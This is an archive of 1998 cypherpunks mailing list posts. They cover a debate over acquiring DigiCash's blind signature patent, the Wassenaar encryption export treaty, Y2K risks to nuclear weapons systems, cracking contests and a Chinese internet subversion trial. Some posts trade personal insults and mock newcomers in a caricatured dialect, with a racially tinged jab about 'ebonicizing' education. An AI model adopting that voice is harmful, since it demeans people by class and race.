In-Reply-To: <004d01be28a9$64561620$0401010a@luckylaptop.c2.net>
Message-ID: <v04020a21b29d677d3898@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 11:06 PM -0500 on 12/15/98, Lucky Green wrote:


> This is one of the many reasons our group has the support of several
> of the larger banks in the world, banking software/EDI vendors, credit
> card clearing houses, personal financial/cryptography software
> vendors, global media corporations, and other players that are
> required to make eCash and other DigiCash IP derived technologies
> ubiquitous.

Kewl!


So... Lucky?  Who do you have?

I mean, it looks like you're announcing that you have the only people of any
financial substance who really care about *using* this technology, much less
investing in it, and they're all lined up for you to pull the trigger and bag
DigiCash.

- From here on out, it's simple, yes? Just announce who they are, publically,
and make your tender offer.

You do that, Scott sees the writing on the wall that he can't sell to anyone
else who's not already on your list of investors, and surrenders, Dorothy.
Gotta know when to fold 'em, and all that.


So, again, Lucky, care to tell us who's backing you up?

After all, *that's* how they do hostile takeovers in *real* life. Just like
secret crypto protocols, there are no anonymous investors on the street. That
stuff's for financial fairy tales.


Well, okay, to be fair, there *is* another way to do this, too, since DigiCash
is a private company currently in the lap of a bankruptcy trustee. It's pretty
simple, really. Just buy up the outstanding debt that caused DigiCash to file
Chapter 11 in the first place and hold out until Scott & Co. forks over the
company. I'm sure that it's less than $10 million. Maybe it's way less, and, I
bet the number's completely knowable, or will be soon, since the legal
documents on the DigiCash bankrupcy are completely public information.
Whatever the amount of the nut is, it's easily chump change to a bunch players
as august as yours must be.

Presto-chango, you get the same result without making the headlines.

Nonetheless, your investors would still have to be public, yes? That's the
consequence of buying assets out of Chapter 11.

But, like the sign says, "If you lived here you'd be home now." If you *could*
do one or the other of the above, you'd have done it already. Shades of Enrico
Fermi, who noted that if there were extraterrestrials within
geologically-attainable timescales of us, they'd *be* here already.


To be honest, I don't really give a hoot *who* owns the blind signature patent
as long as they license the damn thing so the rest of the world can get on
with using it.  However, DigiCash, at the moment, has a nut to crack in the
millions of dollars. The people holding those um, nuts, don't care who pays
them as long as they get their money back. After that's taken care of, all of
us can go play moneypunks to our hearts' content. I'm pretty sure that Scott
Loftesness, after being a permanent fixture on all of the lists I've ever
started :-), knows *exactly* what to do with the patents once the bills are
paid. Or at least what *I* think he should do. :-).


Frankly, Lucky, just promising us, "HAL"-like, that "something wonderful's
gonna happen", that you have, like Nixon, "a secret plan to end the war" just
doesn't cut it anymore. Been there, done that, that dog don't hunt, etc.

Just about every time I turn around, I get private mail from some cypherpunk
or other with a secret plan to take over DigiCash and free the blind signature
patent for us all, that they're really just a stalking horse for some really
huge and famous investor, but they can't tell me who, just now. It's getting
tiring, frankly, and, like always, money talks, and so forth.

The cost of anything is the foregone alternative, including reputation
capital.


So, I guess it's time I anted up some of what little I have myself, :-), and
called your hand, here, Lucky. First, *my* cards...

After my recent trip to London, I have enough actual cash, promised from about
3 sources, and maybe from one or two more, to form a small syndicate which can
pay the present value, at 15% and an 8 year remaining life on the blind
signature patent, on about $1-2 million in equivalent patent income. I think I
can get more people and money signed on over the next few months, but if you
do the math, the amount I'm talking about is not much actual cash, paid up
front. Enough for a nice house in some places, but that's about it. However it
may be that it is, quite literally, a cash bird in the hand vs. two future
revenue birds in the bush, frankly, Scott hasn't gotten that close to the end
of his rope, just yet. He's already turned down a cash offer for more than
that that I know of, whether you and I are talking about the same rejected
offer or not.

But the amount I'm calculating above is still pretty much fair market on
what's left of the residual financial cryptography *research* value on the
blind signature patent, and that much money could, just barely, keep the
patents from being buried with DigiCash if it ever came to that. That is,
nobody knows how to actually *make* money on these patents. (Or DigiCash would
have done it already and/or somebody would have coughed up the money to buy
DigiCash out of hock by now otherwise.) But a lot of us have research *ideas*
which *might* make money, and which need to be tested in the marketplace to
see if they actually work, the payments business being what it is. So, a
million or two is about what I would guess the *entire* market is willing to
pay for the privilege of *experimenting* with blind signatures over the
remaning 8-year life of the patent. That comes to up-front, present value,
"bird in the hand", cash in the low to mid six figures, depending on how much
you think the patents can earn out in research payments.

I haven't announced the folks who've verbally committed to fund this syndicate
yet. But, I'm changing that.

I'm asking the person who's volunteering to floor-manage the legal part of the
syndicate to draw up an offering memorandum, or whatever, and when these
people who have made verbal offers have actually signed something legally
binding, I'll announce who they are publically on the Philodox website.


So, that's what I have, Lucky. My game plan is to form a small syndicate to
buy the blind signature patent, and a few patents, from DigiCash, or what's
left of it, for the estimated research revenue they may bring, but, only
*after* Scott has exhausted any ability he has to get any revenue from other
sources.


Now for *your* cards: It sounds like you're promising your investors something
significantly more than the present value of the returns on research
royalties, and I wish you luck. But it seems to me that you don't have to be
so skulduggerous, if you've really got what you claim you have in your quote
above.

And, so, Lucky, whatcha got, and, more to the point, who do ya have? Have they
signed memoranda of understanding, if not actual legal committments of
capital? Have you formed a corporation to transfer the patents to, or are you
going to purchase DigiCash, Inc., with all it's potential domestic and foriegn
liability? And so on.

Details, please.


Cheers,
Robert Hettinga


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNnfeJcUCGwxmWcHhAQFmqgf9EyLxZ7o5THZk24sycXIHRG8Rpf39A1ax
PGpqbxphoxKfPqr/35J1Ei8Y7bXkodv+SKX5s9957rgtLtgSENOfREwG7OlcxJxj
G1IOsIKf1umNZ5rUWRrlOwYVx8eEAIViW0U3h4Tj0zdyjUy0hSyPrbWjColmY/Wc
mzZSMKTz5ajmThTkdszUM13EDhadZ09RRf3su7yzquIHOEx5WNKDrPq4CvCzM8ii
60WgZnVhsGyBYuPHujpe1Z6suimuJsUuLZHL0JN6nM94+KXqPSKLXpT+PNN45wqf
OFKTsmtZxcXqbivD9OMQUO3kufJkpsVv+3WG93LgLSb6nM5gB5e0Gw==
=vHGx
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevlar <webmaster@max-web.com>
Date: Thu, 17 Dec 1998 04:28:44 +0800
To: cypherpunks@toad.com
Subject: Strike may have had small impact...
Message-ID: <3.0.6.32.19981216112825.00895bf0@max-web.com>
MIME-Version: 1.0
Content-Type: text/plain



I think the impact of the strike on December 14 against the Wassenaar
Arrangement has been greatly under-estimated. Even though I can only
comfirm a handfull of brave souls may have supported the cause, the
discussion about it was enough to raise awareness. And wasn't that the point?

I submit this as proof for your aproval:
(Orinigal story quoted directly from:
http://www.zdnet.com/icom/e-business/1998/12/wassenaar/index.html )

December 14, 1998 
Wassenaar Pact May Threaten Global
E-com 

By Jim Kerstetter - PC Week 
Could a treaty banning the use of strong encryption put
the screws, once again, to the U.S. encryption industry?
Cryptographers and others in the security industry worry
that that could be exactly what is happening.
The Clinton administration this month, in an about-face to
indications that it was loosening its grip on encryption,
announced the signing of a treaty with 32 countries called
the Wassenaar Arrangement. The treaty would limit key
lengths to 64 bits or less.

Clinton administration officials said the treaty will, for the
first time, level the playing field for U.S. companies trying
to sell abroad. That's true, to a point. U.S. companies
have long complained that they were unfairly hampered by
the lack of restrictions in other countries. What they had
hoped would happen--and what the administration
seemed to be edging toward--was an easing of U.S.
export laws. They never asked for stronger controls in
other countries.

The Wassenaar Agreement broadsided many who had
watched the Clinton administration over recent years
grant export licenses for strong encryption products to
companies such as Hewlett-Packard Co. and Netscape
Communications Corp.

Jeff Smith, general counsel of the Washington industry
group Americans for Computer Privacy, said in a
statement the treaty is a welcome attempt to level the
playing field, but "it also demonstrates flaws in our
government's encryption export policies."

Security status quo 
So what does it mean if the agreement does become
law? For starters, it would not cut the use of unbreakable
encryption. The Data Encryption Standard, the U.S. standard for symmetric, or
private-key, encryption, has been broken at 56 bits. No one has publicly
acknowledged breaking a DES key longer than that. The Triple DES key,
commonly used in the United States, would continue to be illegal for export. 

Ironically, the government's own proposed Advanced Encryption Standard, which
is expected to replace DES in about two years, would not be allowed for
export.
It's not clear what the treaty will mean to companies that have already been
granted export licenses either for strong encryption--the
financial-transaction
encryption that has been exempt in the past--or for authentication mechanisms
that usually take 1,024 bits.

In other words, the treaty would reinforce the status quo in the United
States.

Elsewhere around the world, it could be a different story. Of the 32 other
nations, several, such as the United Kingdom and Japan, already have strong
encryption controls. But others, such as Germany, have virtually no export
controls, and companies there could be seriously impacted.

About 18 months ago, the control of encryption products was taken out of the
hands of the U.S. Department of Defense, which had long considered encryption
a munition, and handed to the Commerce Department. Although the result was
often the same--the DOD, the National Security Agency, the CIA and the FBI
still had a say in what could and could not be exported--the shift of
control was considered by many to be a sign that the administration was
growing more friendly to industry concerns.

Those hopes were further bolstered when export limits were raised from 40
bits to 56 bits, when financial institutions where allowed to use whatever
they wanted to protect transactions and when a long list of companies
gained export approval.

But the Wassenaar Agreement, which must still be approved by Congress and
legislative bodies in most of the participating countries, would put the
brakes on that road to government deregulation.

Jim Kerstetter is a staff writer at PC Week. Send e-mail to
jim_kerstetter@zd.com. 



-Kevlar
<Webmaster@max-web.com>

Does God know Peano Algebra? Or does she not care if strong atheists
couldnt reason their way out of a trap made of Boolean presumptions?

A little bit of knowledge is a dangerous thing, but zero knowlege is
absolutely subversive.

Overspecialization breeds in weakness. It's a slow death.

Beat your algorithms into swords, your dumb terminals into shields, and
turn virtual machines into battlefields... Let the weak say, "I am strong"
and question authority. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 17 Dec 1998 05:06:25 +0800
To: Robert Hettinga <cypherpunks@Algebra.COM>
Subject: Re: DigiCash Update, part II
In-Reply-To: <004d01be28a9$64561620$0401010a@luckylaptop.c2.net>
Message-ID: <v03130317b29dbeae5c0d@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:22 AM -0800 12/16/98, Robert Hettinga wrote:

>Well, okay, to be fair, there *is* another way to do this, too, since DigiCash
>is a private company currently in the lap of a bankruptcy trustee. It's pretty
>simple, really. Just buy up the outstanding debt that caused DigiCash to file
>Chapter 11 in the first place and hold out until Scott & Co. forks over the
>company.
...
>Presto-chango, you get the same result without making the headlines.

The bankruptcy laws simply don't work this way. At least not in the U.S. My
understanding is that the current instance of Digicash is a fully
U.S.-based company.

Those holding debts, secured or unsecured, don't have the company or its
patents "forked over to them."

If a company is ultimately liquidated the physical plant, furnishing,
equipment, bank accounts (if any), patents, and (sometimes) "good will" are
sold. Proceeds then go to the various debt holders according to their class
of debt.

The debt holders _may_ have side deals, contractually arranged, which give
them rights of first refusal on certain patents or assets. But not usually.

So, buying the debt of a company facing liquidation guarantees almost
nothing about gaining access to patents. Someone who has no debt interest
in the company may well end up outbidding others for assets, including
patents.

This is just basic business stuff. I'm an investor in

About the wisdom of announcing a takeover publically I'll say nothing.

--Tim May

Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 17 Dec 1998 05:03:15 +0800
To: cypherpunks@cyberpass.net
Subject: y2k+weapons
Message-ID: <199812162011.MAA01025@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



finally a good analysis of the weaponry situation.. surprised
it has taken this long for anyone to write something like this.
hopefully most weaponry systems will have failsafe mechanisms
that prevent them from being shot off. in other words, they
will malfunction, they will not work or be launchable.. worst
case scenario of course is that they launch..!!  the analogy
is sort of like with stop lights. how horribly will they fail?
for example stop lights could fail and just blink in all 4
directions, or they could be green in all 4 directions.. both
are a failure, but the latter is more like a "catastrophic"
failure.. with weapons, inoperability is a failure, launching
is a catastrophic failure.

------- Forwarded Message


Delivered-To: pswann@easynet.co.uk
From: Carolyn Langdon <forumpub@stlc.com>
Subject: Y2K and Nuclear Weapons Command
Date: Wed, 9 Dec 1998 16:25:51 -0500
Organization: St Lawrence Centre for the Arts
Encoding: 119 TEXT

Science for Peace
Media Release
For immediate release - December 1998

Y2K and Nuclear Weapons Command and Control Systems

Toronto - There are over 35,000 nuclear weapons remaining in the world
today.  These arsenals contain the destructive power of 650,000 Hiroshima
bombs. Thousands of these weapons, mostly land-based ballistic missiles and
submarine launched missiles are in a state of ready deployment.  That is
their warheads, which contain the nuclear fissile material, are attached to
their delivery systems.

Computers have become increasingly central to nuclear operations but they
have not been without their glitches and serious flaws. During the Cold War
computer malfunctions produced several serious false alarms of missile
attacks, and during the Gulf War computer malfunctions contributed to the
failings of the Patriot anti-missile system.

"Both Russia and the U.S. are believed to have a "launch on warning"
policy, so that a retaliatory launch is made after an adversary's missile
is detected, and before the warhead impacts.  Thus a single accidental or
unauthorized launch could result in wholesale nuclear war." says Dr. Alan
Phillips of Science for Peace.

"When you factor in the Y2K computer problem an already dangerous situation
becomes untenable", says Calvin Gotlieb from Science for Peace.  "A Y2K
meltdown in the nuclear systems of any one of the nuclear countries - the
U.S., Russia, China, France, Britain, India, Pakistan and Israel (an
undeclared nuclear state) would spell disaster."

Dr. Barbara Simons, President of the Association for Computing Machinery
states,
"I am not going to worry about whether or not my VCR might become confused
on 1/1/00.  The worst case scenario is not especially bad.  I am, however,
going to worry about whether or not a computer that controls a major
weapons system becomes confused on 1/1/00."

Research findings by a number of different agencies and experts, both
inside and outside the U.S. Dept. of Defense (DOD), show "no confidence" in
the Pentagon's present program to meet the Year 2000 challenge.  The DOD
weapons systems utilize millions of 'embedded systems' in the form of
microchips and microprocessors.  U.S. Deputy Secretary of Defense John
Hamre has admitted that, "everything is so interconnected, it's very hard
to know with any precision that we've got it fixed."  This was the U.S.
state of affairs after 2 billion dollars had been spent trying to fix it.
 There is little information coming out of Russia about their progress with
Y2K problems, but we can safely surmise that all can't be well given their
diminished resources.

David Parnas, the NSERC/Bell Industrial Research Chair in Software
Engineering at McMaster University is concerned about the risks posed by
the Y2K computer problem and nuclear systems. He says that, "The US
military establishment is heavily dependent on computers for communication,
intelligence and for control of weapons.  Computer programs are very
complex constructions.  When a problem is discovered it often takes weeks
to fix.  Often the "fixed" program is still not right and requires further
repair after the revised program is put into service.  Sometimes, programs
that are not date sensitive exchange dates with programs that are and will
fail when those 'partner' programs fail."


The Fail Safe Solution:

All nuclear weapons states need to disconnect their nuclear warheads from
their delivery systems to eliminate the risk of nuclear war by
miscalculation, accident, or the Y2K problem. With proper planning and
sufficient lead-time, it is technically feasible.  In 1991, in the wake of
the coup attempt in the Soviet Union, Presidents Bush and Gorbachev took
thousands of nuclear weapons off deployment in a short period of time.  The
most difficult problem will be providing safe storage for the thousands of
warheads from land-based missiles.  In view of the risks involved in
leaving weapons on ready alert, this difficulty can be easily overcome if
governments start planning now.

We need to hear from NATO, the U.N. and Congress that a multilateral
approach to the Y2K problem is being coordinated.  To date there has been
near silence.  Time is running out for a coordinated approach.

Similar views to those of Science for Peace are held by individual computer
scientists and nuclear physicists, organizations like the Institute for
Energy and Environmental Research and the British American Security
Information Council, both based in the U.S., and Physicians for Global
Responsibility among others.

- - - 30 -
For more information please contact:

Science for Peace Board members:

Dr. Alan Phillips, Science for Peace & Physicians for Global Survival,
905-385-0353
Calvin Gotlieb, Professor Emeritus, Dept of Computer Science, U of T
T. 416-978-2986 or 416-482-4509
David Parnas, P.Eng., NSERC/Bell Industrial Research Chair in Software
Engineering, Dept. of Computing and Software, Faculty of Engineering at
McMaster University 905-525-9140x27353 or 905-648-5772

Other:
Barbara Simons, President of the Association for Computing Machinery
(simons@acm.org)
Arjun Makhijani, Institute for Energy and Environmental Research (U.S.)
301-270-5500

For further information on the Y2K issue and other related nuclear issues
see the Science for Peace website at:   www.math.yorku.ca/sfp/

Science for Peace is located at University College, 15 King's College
Circle,
University of Toronto M5S 3H7 Canada.  Tel. 416-978-3606.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 17 Dec 1998 05:24:10 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Strike may have had small impact...
In-Reply-To: <3.0.6.32.19981216112825.00895bf0@max-web.com>
Message-ID: <v03130318b29dc992edea@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:28 AM -0800 12/16/98, Kevlar wrote:
>I think the impact of the strike on December 14 against the Wassenaar
>Arrangement has been greatly under-estimated. Even though I can only
>comfirm a handfull of brave souls may have supported the cause, the
>discussion about it was enough to raise awareness. And wasn't that the point?
>
>I submit this as proof for your aproval:
>(Orinigal story quoted directly from:
>http://www.zdnet.com/icom/e-business/1998/12/wassenaar/index.html )
>
>December 14, 1998
>Wassenaar Pact May Threaten Global
>E-com
>
>By Jim Kerstetter - PC Week
...

I didn't see any mention of the little strike.

If you think Wassenaar wasn't already a story, and that only the "strike"
of 63 geeks made it into a story, you're just one of the nitwits.

--Tim May

Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 17 Dec 1998 05:32:53 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CyberScam
In-Reply-To: <199810231545.RAA01452@replay.com>
Message-ID: <v03130319b29dca4317ce@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain




I wanted to see what other nonsense this nitwit has written, and found this:

At 10:12 AM -0800 10/23/98, Kevlar wrote:

>
>My bad. You were serious. But still...
>

My bad _what_? The fragment "My bad" is nonsense.


>Mozilla (NS), IE, and many other less well known (but certianly as popular)
>WEB browsers have encryption built right into them, so you can do things
>"Securely". Nobody uses their real name on the internet, unless it's for
>buisness,

Nonsense. Many of us use our "real names" on the Internet, right here on
this non-business list. In fact, real names outnumber nyms by probably
10-1. Ditto for most of the Usenet and most mailing lists. Chat rooms may
be a different story...I wouldn't know about them.

>Naturally this is in compareison to the internet's predacessor (Not
>ARPAnet, that was a government project. BBS's came first)
><grumblegrumbledamninternetstoleallthecallersfrommyboardafter5yearsofrunning
>itgrumble>, which were mostly free to anyone who came and wanted to dl/ul a
>file or post in the message base. And usally if it wasn't open you could
>apply for access.

No, BBBs (not "BBS's") did _not_ come first. I had an ARPANet account in
1973 or so, long before any meaningful BBSs were available. (And the
ARPANet goes back to 1967-8 or so.)

Nitwit.

--Tim May


Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Vogt <tv@wlwonline.de>
Date: Wed, 16 Dec 1998 20:55:01 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: I must admit. . . (fwd)
In-Reply-To: <199812150144.TAA05750@einstein.ssz.com>
Message-ID: <3677A494.3825B97C@wlwonline.de>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> > Cypherpunks write code?
> 
> It's too bad they don't publish some of it in a newspaper or two...

now that would be a novel idea... buy some add space and use it to
publish rsa... :)

btw: hi, I'm new to the list. you'll hear more from me in a second.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Dec 1998 06:33:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Network Associates' KRA Partner status
Message-ID: <367829BD.D92B0106@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Somebody said in response to my quoting the message from KRA to
Dave Del Torto:
> The membership applications they are referring to may just be the
> paperwork needed to officially transfer the membership from TIS to NAI.
> This would represent NAI's decision to continue to be a member of the
> KRA but would not be a matter of joining anew; rather it would maintain
> the existing relationship inherited from TIS.

Whether or not KRA had a legal existence at the time NAI withdrew from
it, my main points (and yours, assuming you're the same Somebody as
before) still stand.  NAI did announce after the PGP acquisition that
they were withdrawing from KRA, whatever its legal status at the time,
and they did take explicit action to join, rejoin, or transfer TIS's
membership to themselves.  It was <not> simply a passive acquisition of
the TIS membership as a result of absorbing TIS.

Our points of difference seem to be much smaller than our agreements,
and the recent Schneier article doesn't appear to match this version
of history.

-- 
	Jim Gillogly
	26 Foreyule S.R. 1998, 21:29
	12.19.5.13.19, 5 Cauac 12 Mac, Ninth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Vogt <tv@wlwonline.de>
Date: Wed, 16 Dec 1998 21:44:47 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The Fallacy of Cracking Contests
In-Reply-To: <4.0.2.19981215202538.00a42b90@mail.visi.com>
Message-ID: <3677AC3D.667AA2D@wlwonline.de>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier wrote:
> 
>         The Fallacy of Cracking Contests
>                       Bruce Schneier
> 
[...]
> 1.  The contests are generally unfair.
[...]
> 2.  The analysis is not controlled.
[...]
> 3.  Contest prizes are rarely good incentives.

I'd like to add:

4.  a breaker is not likely to tell

at least part of the people entering such a contest who have what it
takes to be successful will NOT report a success. in many cases, waiting
until the seemingly secure product actually ships and THEN applying the
gained knowledge will yield far greater rewards.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 17 Dec 1998 04:13:44 +0800
To: cypherpunks@cyberpass.net
Subject: [e-money] Press Review IV: E-mail trail
Message-ID: <v04020a28b29db1f6bace@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Wed, 16 Dec 1998 14:37:56 +0100
To: e-money@moving-art-studio.com
From: jens-ingo <jens.ingo.brodesser@euronet.be>
Subject: [e-money] Press Review IV: E-mail trail
Sender: owner-e-money@mail.serve.com
Reply-To: owner-e-money@moving-art-studio.com

MOVING ART STUDIO
LIST: E-MONEY
http://www.moving-art-studio.com/
=================================
found in
wired news on 16 dec 1998 pst
http://www.wired.com/news/news/politics/story/16485.html

==================== start quoted text ====================

                        China Delays Net Trial
                        Reuters

                        7:35 a.m.  25.Nov.98.PST
                        SHANGHAI -- China has delayed the closed-door
                        trial of a man accused of using the Internet to
                        undermine the state, and on Wednesday his wife
                        called for an open court hearing.

                        Lin Hai, a 30-year-old computer engineer, had
                        been scheduled to go on trial on Thursday. He is
                        accused of inciting subversion of state power, but
                        a Shanghai court has postponed the case
                        indefinitely, said Lin's wife, Xu Hong.

                        "They did not say when it might get underway,"
                        Xu told Reuters. "When it starts, I would want it to
                        be in open court so there would be public
                        scrutiny."

                        Lin, who was arrested in March, has been accused
                        of using the Internet to send tens of thousands
                        of email addresses to VIP Reference, a dissident
                        publication based in the United States. If
                        convicted, he could face up to life in prison.

                        The case was to be heard in a closed-door
                        session at the Shanghai Number One
                        Intermediate Court. Even the defendant's wife
                        was to be barred from court.

                        "Of course I believe I should be at the trial," Xu
                        said. "But the hearing should be open to the
                        public as well."

                        The court offered no explanation for its sudden
                        decision to postpone the hearing, but Xu said it
                        could be a result of international interest in the
                        case. The case has been ignored by the official
                        Chinese media but has attracted widespread
                        attention abroad.

                        Some 1.2 million Chinese are on the Internet,
                        and the total is expected to reach 5 million by
                        2000. The government has embraced the
                        Internet, but so have a number of dissident
                        groups.

                        VIP Reference, one of many dissident
                        publications that have sprung up online, says it
                        sends information to 250,000 email accounts in
                        China from various email addresses in the United
                        States.

                        Court documents called VIP Reference a hostile
                        foreign organization, and claimed it used data
                        provided by Lin "to disseminate large numbers of
                        articles aimed at inciting subversion of state
                        power and the socialist system."

                        Lin ran a now-defunct software company that set
                        up Web sites and provided job searches for
                        multinational companies. His supporters say he
                        frequently exchanged or purchased email
                        addresses to build up a database for his online
                        job search business.

                        Copyright(c) 1998 Reuters Limited.

==================== end quoted text ====================
==================================
You are subscribed to the list e-money.
To *un*subscribe simply send mail to
e-money@moving-art-studio.com
*message text: subscribe or unsubscribe*

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Wed, 16 Dec 1998 23:53:05 +0800
To: mib <mib@io.com>
Subject: Re: I must admit. . .
Message-ID: <19981216144244.7920.rocketmail@send101.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



Cypherpunks write code?  Make people use it. . .




---mib <mib@io.com> wrote:
>
> On Mon, Dec 14, 1998 at 12:25:50PM -0800, you wrote:
> > I wonder sometimes whether or not there is hope for us to ever stop
> > this tyrrany.  I've seen a bunch of us diss the strike saying it was
> > an outlandish and foolish idea, but I hadn't seen anyone of you come
> > up with something better.
> 
> Cypherpunks write code?
> 
> - d.
> 

==
"Be sand in the gears of the machine." Henry David Thoreau
            


_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Thu, 17 Dec 1998 07:48:21 +0800
To: "'Tim May'" <cypherpunks@cyberpass.net
Subject: RE: Nitwits
Message-ID: <2FBF98FC7852CF11912A0000000000010D19ADDE@DINO>
MIME-Version: 1.0
Content-Type: text/plain



Tim May Wrote...
> 
> Some (Nitwits) are from Yahoo, some from MyDejaNews (tm), some from 
> HotMail. And then
> there are the unilluminati from WebTV and AOL.
> 

The depressing thing is that AOL as at least 14 million paying subscribers.
It may even be up to 20 million. Hotmail has 30 million active accounts. The
unilluminati are the future of the internet.

Harv




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 17 Dec 1998 06:02:14 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: CyberScam (fwd)
Message-ID: <199812162106.PAA13774@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 16 Dec 1998 12:43:07 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: CyberScam

> No, BBBs (not "BBS's") did _not_ come first. I had an ARPANet account in
> 1973 or so, long before any meaningful BBSs were available. (And the
> ARPANet goes back to 1967-8 or so.)

1969.


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 17 Dec 1998 08:08:52 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Nitwits
In-Reply-To: <2FBF98FC7852CF11912A0000000000010D19ADDE@DINO>
Message-ID: <v0313031bb29df059d4fd@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:02 PM -0800 12/16/98, Harvey Rook (Exchange) wrote:
>Tim May Wrote...
>>
>> Some (Nitwits) are from Yahoo, some from MyDejaNews (tm), some from
>> HotMail. And then
>> there are the unilluminati from WebTV and AOL.
>>
>
>The depressing thing is that AOL as at least 14 million paying subscribers.
>It may even be up to 20 million. Hotmail has 30 million active accounts. The
>unilluminati are the future of the internet.
>

By the way, I don't condemn AOL and even WebTV out of hand. For some, it's
the best way to get access to the Net, or at least better than what they
currently know about. As bad as some features of AOL are, their browser and
mailer capabilities are actually _better_ than what some university and
corporate users are stuck with (until recently, some only had VT100s
running off of VAXen).

The problem is that the Net and all fora on the Net are being invaded by
folks who were the "C" students in high school English. (Actually, some of
these illiterates may have gotten "B"s in their English classes, maybe even
a few "A"s...such has been the effect of dumbing-down and ebonicizing our
educational system.)

"Like, cuz, my bad! WareZ..where? I cant unnerstand why u all think speling
is so imporrtant. Like you prolly past English class or sumpin."

And these folks don't seem to read, haven't thought deeply about poltical
or social issues, and just appear to drop in on lists and spew for a few
weeks before, thankfully, vanishing.

Filters are the answer, of course. If I were on any high volume mailing
lists these days, which I'm not, I'd consider shifting to a "positive
reputation filter" mode. Which I may do anyway.

--Tim May

Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 17 Dec 1998 07:01:50 +0800
